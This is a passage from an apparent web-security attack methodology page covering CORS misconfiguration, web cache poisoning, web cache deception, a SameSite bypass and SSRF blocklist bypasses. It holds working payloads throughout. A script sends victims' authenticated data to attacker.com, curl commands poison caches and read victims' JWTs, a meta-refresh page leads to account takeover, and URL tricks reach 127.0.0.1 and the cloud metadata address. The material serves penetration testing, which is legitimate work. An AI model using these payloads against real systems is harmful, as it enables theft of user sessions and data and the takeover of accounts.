&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If the victim is logged in, the cookies will be sent
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fetch(&lt;span style="color:#a6d189"&gt;&amp;#39;https://target.com/wp-json/wp/v2/pages&amp;#39;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;include&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}).then(r =&amp;gt; r.json()).then(data =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// Authenticated data extracted cross-origin
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(&lt;span style="color:#a6d189"&gt;&amp;#39;Stolen data:&amp;#39;&lt;/span&gt;, data);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fetch(&lt;span style="color:#a6d189"&gt;&amp;#39;https://attacker.com/collect&amp;#39;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; method&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;POST&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; body&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; JSON.stringify(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government transparency portal — reflected Origin + &lt;code&gt;Access-Control-Allow-Credentials: true&lt;/code&gt; + all HTTP methods (GET, POST, PUT, PATCH, DELETE). Any malicious site could perform authenticated cross-origin POST as admin.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="18-web-cache-poisoning--web-cache-deception" &gt;
&lt;div&gt;
&lt;a href="#18-web-cache-poisoning--web-cache-deception"&gt;
#
&lt;/a&gt;
18. WEB CACHE POISONING &amp;amp; WEB CACHE DECEPTION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="181-web-cache-poisoning-wcp" &gt;
&lt;div&gt;
&lt;a href="#181-web-cache-poisoning-wcp"&gt;
##
&lt;/a&gt;
18.1 Web Cache Poisoning (WCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Poison the CDN cache to serve malicious content to ALL visitors.&lt;/p&gt;
&lt;h4 id="step-1-detect-the-cache" &gt;
&lt;div&gt;
&lt;a href="#step-1-detect-the-cache"&gt;
###
&lt;/a&gt;
Step 1: Detect the Cache
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers that indicate cache&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(age|x-cache|cf-cache-status|via|server)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Confirm that Age increments&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; i in &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; 3; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;^age:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Header&lt;/th&gt;
&lt;th&gt;CDN/Proxy&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;X-Cache: Hit from cloudfront&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;AWS CloudFront&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Cf-Cache-Status: HIT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cloudflare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Age: N&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cache with active TTL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Via: 1.1 varnish&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Varnish&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="step-2-find-unkeyed-inputs-reflected-headers" &gt;
&lt;div&gt;
&lt;a href="#step-2-find-unkeyed-inputs-reflected-headers"&gt;
###
&lt;/a&gt;
Step 2: Find Unkeyed Inputs (Reflected Headers)
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Headers that are NOT part of the cache key but are reflected in the response:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;X-Forwarded-Host, X-Forwarded-Scheme, X-Forwarded-For,
X-Host, X-Original-URL, X-Rewrite-URL, Forwarded,
X-Forwarded-Port, X-Amz-Website-Redirect-Location,
X-HTTP-Method-Override, X-HTTP-Method, X-Method-Override
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test each header with a cache buster&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; header in &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host: evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Scheme: http&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Host: evil.com&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Original-URL: /evil&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;=== &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$header&lt;/span&gt;&lt;span style="color:#a6d189"&gt; ===&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$RANDOM&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$header&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; 2&amp;gt;&amp;amp;&lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; | grep -c &lt;span style="color:#a6d189"&gt;&amp;#34;evil&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="step-3-prove-that-the-payload-stuck-in-cache" &gt;
&lt;div&gt;
&lt;a href="#step-3-prove-that-the-payload-stuck-in-cache"&gt;
###
&lt;/a&gt;
Step 3: Prove that the Payload Stuck in Cache
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 1: Poison&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host: evil.com&amp;#34;&lt;/span&gt; &amp;gt; /dev/null
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 2: Verify cache HIT (WITHOUT the malicious header!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;x-cache: HIT&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Phase 3: Read cached response (must contain &amp;#34;evil.com&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?cb=POISON123&amp;#34;&lt;/span&gt; | grep &lt;span style="color:#a6d189"&gt;&amp;#34;evil.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it appears → Cache Poisoning CONFIRMED&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="impact-by-reflection-location" &gt;
&lt;div&gt;
&lt;a href="#impact-by-reflection-location"&gt;
###
&lt;/a&gt;
Impact by Reflection Location
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Where the Payload Appears&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;script src=...&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Stored XSS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Executes JS on every visitor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;link rel=canonical&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;SEO Poisoning&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Google indexes attacker URL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;meta property=&amp;quot;og:url&amp;quot;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Phishing previews&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;WhatsApp/Facebook show fake link&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Forced redirect&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Victim redirected without interaction&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;form action=...&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Credential theft&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Forms send to attacker&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;@import url(...)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CSS data exfiltration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Steals tokens via CSS injection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="182-web-cache-deception-wcd" &gt;
&lt;div&gt;
&lt;a href="#182-web-cache-deception-wcd"&gt;
##
&lt;/a&gt;
18.2 Web Cache Deception (WCD)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Force the cache to store the victim&amp;rsquo;s SENSITIVE responses and then read them.&lt;/p&gt;
&lt;h4 id="conditions-to-be-exploitable" &gt;
&lt;div&gt;
&lt;a href="#conditions-to-be-exploitable"&gt;
###
&lt;/a&gt;
Conditions to be exploitable:
&lt;/div&gt;
&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;Cache-Control&lt;/code&gt; does NOT contain &lt;code&gt;private&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Response contains sensitive data (JWT, tokens, PII, CSRF nonce)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;X-Cache: MISS&lt;/code&gt; → &lt;code&gt;X-Cache: HIT&lt;/code&gt; confirmed&lt;/li&gt;
&lt;li&gt;No &lt;code&gt;Vary: Cookie&lt;/code&gt; header&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="payload--force-cache-of-sensitive-page" &gt;
&lt;div&gt;
&lt;a href="#payload--force-cache-of-sensitive-page"&gt;
###
&lt;/a&gt;
Payload — Force Cache of Sensitive Page
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extensions that CDNs typically cache: .css .js .png .jpg .ico .pdf .json .xml&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Apply these extensions to sensitive pages:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (with cookies):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile.css&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Cookie: session=VICTIM_SESSION&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker reads the cache:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile.css&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;jwt\|token\|secret&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="same-technique-with-cache-buster-to-isolate-a-specific-victim" &gt;
&lt;div&gt;
&lt;a href="#same-technique-with-cache-buster-to-isolate-a-specific-victim"&gt;
###
&lt;/a&gt;
Same technique with Cache Buster to isolate a specific victim:
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker prepares URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;CACHE_BUSTER&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;victim_&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;date +%s&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Victim visits (with authenticated cookies):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://target.com/my-profile?cb=$CACHE_BUSTER&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Attacker reads:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/my-profile?cb=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$CACHE_BUSTER&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="183-samesite-bypass--wcd" &gt;
&lt;div&gt;
&lt;a href="#183-samesite-bypass--wcd"&gt;
##
&lt;/a&gt;
18.3 SameSite Bypass + WCD
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Cookies &lt;code&gt;SameSite=Lax&lt;/code&gt; are not sent in cross-site requests via &lt;code&gt;&amp;lt;img&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt;, &lt;code&gt;fetch()&lt;/code&gt;. BUT they are sent in &lt;strong&gt;top-level navigation&lt;/strong&gt; (URL bar change).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;&amp;lt;!-- Payload: meta refresh = top-level navigation --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;meta&lt;/span&gt; &lt;span style="color:#8caaee"&gt;http-equiv&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;refresh&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;content&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;0; url=https://target.com/my-profile?cb=victim123&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;Attack flow:
1. Attacker hosts page with &amp;lt;meta refresh&amp;gt; → URL with cache buster
2. Victim visits attacker&amp;#39;s page
3. Browser performs top-level nav → SameSite=Lax cookies SENT
4. Victim&amp;#39;s authenticated response (with JWT) is cached
5. Attacker visits same URL → X-Cache: HIT → receives victim&amp;#39;s response
6. Extracts JWT → ATO (Account Takeover)
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="184-trap-reflection--cache-poisoning" &gt;
&lt;div&gt;
&lt;a href="#184-trap-reflection--cache-poisoning"&gt;
##
&lt;/a&gt;
18.4 Trap: Reflection ≠ Cache Poisoning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Common mistake&lt;/th&gt;
&lt;th&gt;Why it&amp;rsquo;s wrong&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;The header reflects in the response&amp;rdquo;&lt;/td&gt;
&lt;td&gt;It&amp;rsquo;s reflection. Without cache proof, it&amp;rsquo;s info-level&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;X-Cache: HIT appeared&amp;rdquo;&lt;/td&gt;
&lt;td&gt;Only the base page is cached, not your payload&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&amp;ldquo;I sent a payload and saw it in the response&amp;rdquo;&lt;/td&gt;
&lt;td&gt;You saw your OWN response, not the cache&amp;rsquo;s&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Rule&lt;/strong&gt;: Without confirmed &lt;code&gt;Age&lt;/code&gt;/&lt;code&gt;X-Cache:HIT&lt;/code&gt; on the response WITH payload → NOT cache poisoning.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="19-ssrf-sqli-lfi--other-classes" &gt;
&lt;div&gt;
&lt;a href="#19-ssrf-sqli-lfi--other-classes"&gt;
#
&lt;/a&gt;
19. SSRF, SQLI, LFI &amp;amp; OTHER CLASSES
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="191-ssrf--server-side-request-forgery" &gt;
&lt;div&gt;
&lt;a href="#191-ssrf--server-side-request-forgery"&gt;
##
&lt;/a&gt;
19.1 SSRF — Server-Side Request Forgery
&lt;/div&gt;
&lt;/h3&gt;
&lt;h4 id="bypass-ip-blocklist-11-techniques" &gt;
&lt;div&gt;
&lt;a href="#bypass-ip-blocklist-11-techniques"&gt;
###
&lt;/a&gt;
Bypass IP Blocklist (11 techniques)
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. URL encoding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;2130706433&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# decimal of 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0x7f000001&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# hex&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;0177.0.0.1&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# octal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. DNS rebinding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;1.0.0.127&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;nip&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;io&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# resolves to 127.0.0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Redirect&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;attacker&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;com&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;redirect&lt;span style="color:#e78284"&gt;?&lt;/span&gt;url&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;http:&lt;span style="color:#99d1db;font-weight:bold"&gt;//&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;169.254.169.254&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
